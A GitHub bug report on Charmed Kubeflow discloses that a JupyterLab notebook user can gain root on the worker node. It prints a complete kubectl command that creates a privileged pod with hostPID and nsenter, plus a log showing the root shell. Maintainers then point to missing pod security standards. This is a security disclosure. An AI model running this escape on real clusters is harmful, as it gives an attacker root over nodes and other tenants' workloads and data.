search

canonical / bundle-kubeflow

Charmed Kubeflow
Apache License 2.0
98 stars 48 forks source link

Escape from notebook to node&user=root possible #700

Open iptizer opened 10 months ago

iptizer commented 10 months ago

Bug Description

During using the Canonical Kubeflow distribution we discovered a major security incident.

It is possible to escape to the worker node with just one command. With this command root privilegues on the worker node are gained and may be used to hook into other users pods or access data of other users.

To Reproduce

  1. Install Kubeflow
  2. Login as user
  3. Start a JupyterLab notebook
  4. Connect to JupyterLab notebook an open a terminal
  5. Execute the following code 
    kubectl run iamrootonthehost --restart=Never -it \
--image overriden --overrides '
{
"spec": {
"hostPID": true,
"hostNetwork": true,
"tolerations": [
{ "effect": "NoSchedule", "key": "node-role.kubernetes.io/master" },
{ "effect": "NoSchedule", "key": "node-role.kubernetes.io/controlplane" },
{ "effect": "NoExecute", "key": "node-role.kubernetes.io/etcd" }
],
"containers": [
{
"name": "alpine",
"image": "alpine:3.7",
"command": [
"nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-"
],
"stdin": true,
"tty": true,
"resources": {"requests": {"cpu": "10m"}},
"securityContext": {
"privileged": true
}
}
]
}
}'
  6. Shell as user root on node is granted.

Environment

Should not matter, but as follows:

Relevant Log Output

jovyan@jupyterlab-0:~$ 
jovyan@jupyterlab-0:~$ kubectl run iamrootonthehost --restart=Never -it \
> --image overriden --overrides '
> {
> "spec": {
> "hostPID": true,
> "hostNetwork": true,
> "tolerations": [
> { "effect": "NoSchedule", "key": "node-role.kubernetes.io/master" },
> { "effect": "NoSchedule", "key": "node-role.kubernetes.io/controlplane" },
> { "effect": "NoExecute", "key": "node-role.kubernetes.io/etcd" }
> ],
> "containers": [
> {
> "name": "alpine",
> "image": "alpine:3.7",
> "command": [
> "nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-"
> ],
> "stdin": true,
> "tty": true,
> "resources": {"requests": {"cpu": "10m"}},
> "securityContext": {
> "privileged": true
> }
> }
> ]
> }
> }'
If you don't see a command prompt, try pressing enter.
sh-4.2# 
sh-4.2# whoami
root
sh-4.2# hostname
ip-xx-xx-xx-xx.eu-central-1.compute.internal
sh-4.2#

Additional Context

No response

juliusvonkohout commented 10 months ago

This is just crazy misconfiguration. Is your cluster missing pod security standards restricted for all namespaces?

kimwnasptd commented 10 months ago

@iptizer as @juliusvonkohout mentioned the above happens because right now there is not component (i.e. kyverno, pod security standards) for restricting privileges across all namespaces.

We are actively looking on natively supporting this in the Charmed Kubeflow and ensure they are working as expected with the rest of the Juju echosystem.

juliusvonkohout commented 10 months ago

@iptizer Here you can track the progress https://github.com/kubeflow/manifests/issues/2528 and here is the official proposal https://github.com/kubeflow/manifests/pull/2527